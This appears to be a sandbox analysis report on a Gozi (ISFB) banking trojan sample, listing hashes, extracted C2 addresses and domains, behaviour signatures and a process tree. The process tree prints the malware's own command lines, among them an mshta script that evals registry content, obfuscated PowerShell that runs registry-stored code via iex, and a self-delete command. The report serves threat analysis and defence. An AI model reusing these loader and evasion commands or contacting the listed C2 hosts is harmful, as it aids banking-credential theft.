Overview

overview

10

Static

static

3

client.exe

windows7-x64

10

client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2023 11:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    client.exe

  • Size

    294KB

  • MD5

    bb35f8c1a3236ad31c754cdfe795d57f

  • SHA1

    b744f8ae31e2b3f7c3b72b9615823a3a3ad02989

  • SHA256

    5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2

  • SHA512

    fcb8f4458b7a5a4a2536a22ad55e4564ffe3d3327e4eefca10a30bc490ae29c8cc31760e07d567de53150090c84bb171209f1f3811f22d3f69545beb15edd0b0

  • SSDEEP

    3072:4e6lIjmvg7aaCIg0JHk8D8uNhUqHAMMQKL2H/NHIS:4blIavYaaCIg6h/NhUDAHlH

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

185.247.184.139

62.72.33.155

incontroler.com
Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:5092
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3404
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3764
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3200
        • C:\Users\Admin\AppData\Local\Temp\client.exe
          "C:\Users\Admin\AppData\Local\Temp\client.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:548
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 292
            3⤵
            • Program crash
            PID:456
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Falq='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Falq).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4540
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vilcjlnohf -value gp; new-alias -name auncmgxgb -value iex; auncmgxgb ([System.Text.Encoding]::ASCII.GetString((vilcjlnohf "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3332
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m0hsjg03\m0hsjg03.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3696
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D9E.tmp" "c:\Users\Admin\AppData\Local\Temp\m0hsjg03\CSC718288AFCDDE42DCBE76DF80F94BB7F9.TMP"
                5⤵
                  PID:640
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j5sb1vmt\j5sb1vmt.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4136
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4EC7.tmp" "c:\Users\Admin\AppData\Local\Temp\j5sb1vmt\CSCB300F073BB3B4A3EB7D45A53F930354D.TMP"
                  5⤵
                    PID:4752
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:1548
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1216
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:3208
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:4384
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 548 -ip 548
              1⤵
                PID:1928

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\RES4D9E.tmp
                Filesize

                1KB

                MD5

                3d15d219fe69db66c6672bafd60e9086

                SHA1

                13575888f9c0ea0e3f4e860ceae0476bb743e318

                SHA256

                450eda7fa99b8af629a922faba4eb3ec9eae8adebd935f41e8bd20992b0916ee

                SHA512

                32fa49abc1682e06dca7080f2e2ac53ef37af7355891eaa6f212a7babc01e95dbfe32c7fb8d22ad5837301d223af4b8cfe33ed7e2335c8f11929d3761a6ed56d

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES4EC7.tmp
                Filesize

                1KB

                MD5

                6e538470cf4616779c101187280989ab

                SHA1

                50359540bd97030410be427f577594ee4025e44c

                SHA256

                6241dd078a0f8ae66b6102cf3440706460c42f3476af09ce5e078d91499be9b4

                SHA512

                19dc44f32438523a1220798a9e0056cce172ad026cfb1d78cb5518c294db32330be95f124d710e26874cf690a75bc6340f3cf10e26c228135540e5d148fa6f0e

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgmnz15r.4nz.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\j5sb1vmt\j5sb1vmt.dll
                Filesize

                3KB

                MD5

                a77c3d5723240bde632b0b8f43a0b05a

                SHA1

                17e8415065c65c268eadfa9ab9a70dcc97a04e55

                SHA256

                c7e79161d78cb3267580ab44b1bd94259b442ae7653b47e50b98fdf28fd27818

                SHA512

                a4a0041fd183f925249ea1bf47f360fc113cb853467e0151864e1afcf066dfe668f54eada68f8b5436127f266554343bd10396928a538608a9ddfaa5caa666ef

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\m0hsjg03\m0hsjg03.dll
                Filesize

                3KB

                MD5

                6c8a595dbb3a7f2a1842825910b9c70e

                SHA1

                1b161755e8fa56e03d5610e77baf4d901abb68d9

                SHA256

                122b904c8d750f44926bf75b3e81a2b39a99d0c450e44e3172422911b72345c2

                SHA512

                93f21bfa5e699662826ae0a66d614073fec59abf8c671a25365f256f79498fe7f7139dd2451079985618f81e85535f1ccf1d7e2f1de069dab9140b353fe9ab92

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\j5sb1vmt\CSCB300F073BB3B4A3EB7D45A53F930354D.TMP
                Filesize

                652B

                MD5

                77e7d8b466e0abea3e262e5edeef299d

                SHA1

                81c30955a78c882bca711de5915af8dea25d6c29

                SHA256

                7eae14bee9d80e5887c6891da0c61dc8e5fb833a92cd0bcca4b994b5777580be

                SHA512

                c4497df36387310172f15cd9c4e3e41d21ce46c209d259b00333a5dba591e286ef51e5f54776500d62523d30c9b28bcce1ea811af70baa6efa699fad38fea5e4

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\j5sb1vmt\j5sb1vmt.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\j5sb1vmt\j5sb1vmt.cmdline
                Filesize

                369B

                MD5

                115bb42a1c176f466e9390811041d211

                SHA1

                a3885ec9cf7f2405d1da7e385f40fb83c07e73d8

                SHA256

                8fb3a6e5fa3587f81e80ec139dde813468d6bca2d45c93d0935585e83894ac68

                SHA512

                c837f843204a5b83db9989f6326c00775076075dc6622b129f1785cedbfbb80007ed0715693cfce0330a0ac1d4f5336a308193e936c7cc928eaf4bfc79ab9067

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\m0hsjg03\CSC718288AFCDDE42DCBE76DF80F94BB7F9.TMP
                Filesize

                652B

                MD5

                79a0a190f70c4a69da7635185e580a9d

                SHA1

                e3412f1e463ed496a9f184a9048aae61795df86c

                SHA256

                f6d3db2104707b9f4543810aef9e691308c7036160f2b42f3079b6fafd87a12b

                SHA512

                bbd30d8f39e178ada33d83da88be37f34596da2ecb624252f7c1e8097f0768116fdf38b9442cfe17c8b78a36e0bb89bdde9e4785f47c70882476ea119a5f267a

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\m0hsjg03\m0hsjg03.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\m0hsjg03\m0hsjg03.cmdline
                Filesize

                369B

                MD5

                0fbdd946aa958cf6422c1243b061bc8a

                SHA1

                24d332630a22d21d7467b5dbd8020b03bd4c5b49

                SHA256

                454a4c4f7c0caa2448aa1238e0b67f74c05f5648bd2320a1d01f69923af42320

                SHA512

                2595165863731c099d1939b03ff00f682240f1bcd0ca330d9b5f942a757ce168155eeb9260dc287a047145b3cdbd0733031d0c94c00f30f8ba9f05f4e47632f1

                Download Submit
              • memory/548-7-0x00000000024F0000-0x00000000025F0000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/548-2-0x0000000002310000-0x000000000231B000-memory.dmp
                Filesize

                44KB

                Download
              • memory/548-115-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/548-1-0x00000000024F0000-0x00000000025F0000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/548-3-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/548-9-0x0000000002310000-0x000000000231B000-memory.dmp
                Filesize

                44KB

                Download
              • memory/548-4-0x0000000002410000-0x000000000241D000-memory.dmp
                Filesize

                52KB

                Download
              • memory/548-8-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/1216-117-0x000001FE3C7C0000-0x000001FE3C864000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1216-107-0x000001FE3C7C0000-0x000001FE3C864000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1216-109-0x000001FE3C870000-0x000001FE3C871000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1548-118-0x000001F95A2A0000-0x000001F95A344000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1548-94-0x000001F95A2A0000-0x000001F95A344000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1548-97-0x000001F95A360000-0x000001F95A361000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3200-57-0x00000000033A0000-0x00000000033A1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3200-56-0x00000000090A0000-0x0000000009144000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3200-95-0x00000000090A0000-0x0000000009144000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3208-105-0x0000000000A60000-0x0000000000A61000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3208-101-0x0000000000F20000-0x0000000000FB8000-memory.dmp
                Filesize

                608KB

                Download
              • memory/3208-112-0x0000000000F20000-0x0000000000FB8000-memory.dmp
                Filesize

                608KB

                Download
              • memory/3332-22-0x000001D8F5F40000-0x000001D8F5F62000-memory.dmp
                Filesize

                136KB

                Download
              • memory/3332-25-0x000001D8DD7D0000-0x000001D8DD7E0000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3332-23-0x00007FFDD5240000-0x00007FFDD5D01000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/3332-24-0x000001D8DD7D0000-0x000001D8DD7E0000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3332-38-0x000001D8DD810000-0x000001D8DD818000-memory.dmp
                Filesize

                32KB

                Download
              • memory/3332-68-0x000001D8F61F0000-0x000001D8F622D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/3332-54-0x000001D8F61F0000-0x000001D8F622D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/3332-67-0x00007FFDD5240000-0x00007FFDD5D01000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/3332-52-0x000001D8F61E0000-0x000001D8F61E8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/3404-77-0x000002B2EC640000-0x000002B2EC641000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3404-108-0x000002B2EC680000-0x000002B2EC724000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3404-76-0x000002B2EC680000-0x000002B2EC724000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3764-102-0x0000022B652A0000-0x0000022B65344000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3764-71-0x0000022B65350000-0x0000022B65351000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3764-70-0x0000022B652A0000-0x0000022B65344000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4384-89-0x000001E604370000-0x000001E604371000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4384-87-0x000001E6042C0000-0x000001E604364000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4384-116-0x000001E6042C0000-0x000001E604364000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5092-82-0x0000023403B30000-0x0000023403BD4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5092-83-0x00000234033D0000-0x00000234033D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/5092-114-0x0000023403B30000-0x0000023403BD4000-memory.dmp
                Filesize

                656KB

                Download